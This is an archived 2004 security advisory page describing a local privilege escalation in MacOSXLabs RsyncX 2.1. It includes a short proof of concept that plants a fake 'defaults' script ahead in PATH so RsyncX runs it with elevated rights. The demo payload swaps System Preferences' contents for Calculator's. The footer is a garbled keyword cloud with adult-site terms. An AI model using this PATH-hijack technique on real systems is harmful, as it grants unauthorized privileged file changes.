about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MacOSXLabs RsyncX Local Privilege Escalation Vulnerability


Title MacOSXLabs RsyncX Local Privilege Escalation Vulnerability
Published 2004-09-17-12:00AM
Updated 2004-09-17-05:27PM
Class Design Error
CVE   CVE-MAP-NOMATCH
Remote  No
Local  Yes
Credit  Discovery of this vulnerability is credited to Matt Johnston <matt@ucc.asn.au>.
Vulnerable  MacOSXLabs RsyncX 2.1
Not Vulnerable  
Code   The following example is available:

First, make a backup of System Preferences.app

Create an executable file ~/bin/defaults with contents of:

=============================
#!/bin/sh
mv "/Applications/System Preferences.app/Contents" "/Applications/System Preferences.app/oldcont"
cp -r "/Applications/Calculator.app/Contents" "/Applications/System Preferences.app/Contents"
=============================

Then run RsyncX with ~/bin in your path:

PATH=~/bin:$PATH /Applications/Utilities/RsyncX.app/Contents/MacOS/RsyncX

Click on System Preferences, and is now a calculator.
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 05:25:15 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
forntpage phpbb sess mambo Remo administra administra sex aneml 4nalbum Mo t724t www.bluese SREYASEX.C t449t mambo Remo t139t Login to C t65t Arandel sexs6.com t785t t194t seancody Login to C seancody t746t seancody t746t doothwalli t803t t599t t724t me downloa wwwsix.com VIDEO SMA www.samira VIDEO SMA IRANISEX wwwsix.com mambo Remo sakillasex www.16sb.c www.16sb.c Free sex i Powered b Women dog sex girls sugar mambo Remo lud sex girls vitsaBB localhost